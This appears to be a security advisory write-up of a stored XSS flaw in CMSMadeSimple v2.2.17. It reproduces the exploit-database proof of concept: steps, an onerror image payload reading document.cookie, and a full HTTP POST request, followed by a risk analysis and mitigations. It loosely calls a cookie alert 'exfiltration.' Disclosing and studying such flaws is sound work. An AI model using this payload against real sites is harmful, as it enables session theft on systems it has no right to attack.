CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-19 
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs:  Stored Xss
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Go to Content Manager
3. Add New Content
4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section

payload: <img src=x onerror=alert(document.cookie)>

5. Submit Content
6. Visit Content (http://localhost/index.php?page=test)

Request:

POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
sec-ch-ua: 
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1


CMSMadeSimple v2.2.17: Stored Cross-Site Scripting Vulnerability Exploited

Security researchers have identified a critical stored cross-site scripting (XSS) vulnerability in CMSMadeSimple v2.2.17, a widely used open-source content management system (CMS). This flaw enables attackers to inject malicious scripts into the application's metadata field, which are then persistently stored and executed whenever users view the affected content. The vulnerability, discovered on July 12, 2023, by Mirabbas Ağalarov, underscores the importance of input sanitization and secure handling of user-generated content in web applications.

Technical Overview of the Vulnerability

The flaw resides in the Content Manager module of CMSMadeSimple, specifically within the metadata field used during content creation. When administrators or users submit content, the system fails to properly sanitize or escape user input before storing it in the database. This allows arbitrary HTML and JavaScript payloads to be saved and later rendered in the browser without proper validation.

As demonstrated in the exploit, an attacker can inject the following payload:

<img src=x onerror=alert(document.cookie)>

This simple yet dangerous snippet exploits the onerror attribute of an <img> tag. Since the image source x is invalid, the browser triggers the onerror event, executing the embedded JavaScript code. The script attempts to alert the user’s cookie data, which may include sensitive authentication tokens or session identifiers.

Exploitation Steps (Proof of Concept)

  • Login to the CMSMadeSimple administrative interface using valid credentials.
  • Navigate to Content Manager under the Admin section.
  • Select Add New Content to create a new page.
  • Enter the malicious payload into the metadata field: <img src=x onerror=alert(document.cookie)>.
  • Submit the content with all required fields filled.
  • Once published, visit the page via its public URL (e.g., http://localhost/index.php?page=test).

Upon loading the page, the browser executes the script, displaying a pop-up alert containing the document.cookie value — effectively exfiltrating session data from the victim’s browser.

Request and Response Analysis

Below is a representative HTTP POST request sent during content submission:

POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 584
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6
Connection: close

mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1

This request includes the metadata parameter with the XSS payload encoded as %3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E — a URL-encoded version of the malicious HTML. The server processes this input without filtering, storing it directly in the database.

Impact and Risk Assessment

Risk Level High
Attack Vector Stored XSS via Content Manager metadata field
Exploitation Difficulty Low (requires admin access)
Impact Session hijacking, data theft, browser-based malware delivery
Affected Users Any user visiting the malicious content page

While the exploit requires administrative access to inject the payload, once stored, it can affect any authenticated or unauthenticated user who visits the page. This makes the vulnerability particularly dangerous in environments where multiple users access shared content.

Security Best Practices & Mitigation

To prevent such vulnerabilities, developers must implement robust input validation and output encoding. Key recommendations include:

  • Sanitize user input using libraries like HTML Purifier or built-in PHP functions such as htmlspecialchars() when rendering content.
  • Validate metadata fields to reject any HTML or JavaScript tags.
  • Use Content Security Policy (CSP) headers to restrict script execution from untrusted sources.
  • Implement proper role-based access control to limit who can modify content metadata.
  • Log and monitor suspicious content submissions for anomalies.

For CMSMadeSimple users, upgrading to a patched version is critical. The vendor, cmsmadesimple.org, should release an updated version with input sanitization fixes to address this issue.

Real-World Implications

Stored XSS vulnerabilities like this one are frequently exploited in real-world attacks. In 2022, a similar flaw in a popular CMS led to the compromise of thousands of websites through malicious content injection. Attackers used such vulnerabilities to deliver phishing scripts, steal session cookies, or redirect users to malicious domains.

When stored XSS is combined with other vulnerabilities — such as SQL injection or authentication bypass — the attack surface expands significantly. Even with moderate access, attackers can establish persistent footholds within a system.

Conclusion

CMSMadeSimple v2.2.17’s stored XSS vulnerability serves as a stark reminder that even seemingly innocuous fields like metadata can become attack vectors if not properly secured. As developers and administrators, we must adopt a defense-in-depth approach: validating input at every stage, encoding output, and enforcing strict security policies.

By understanding and mitigating such flaws, we not only protect our systems but also safeguard the trust of users who rely on our platforms for information and interaction.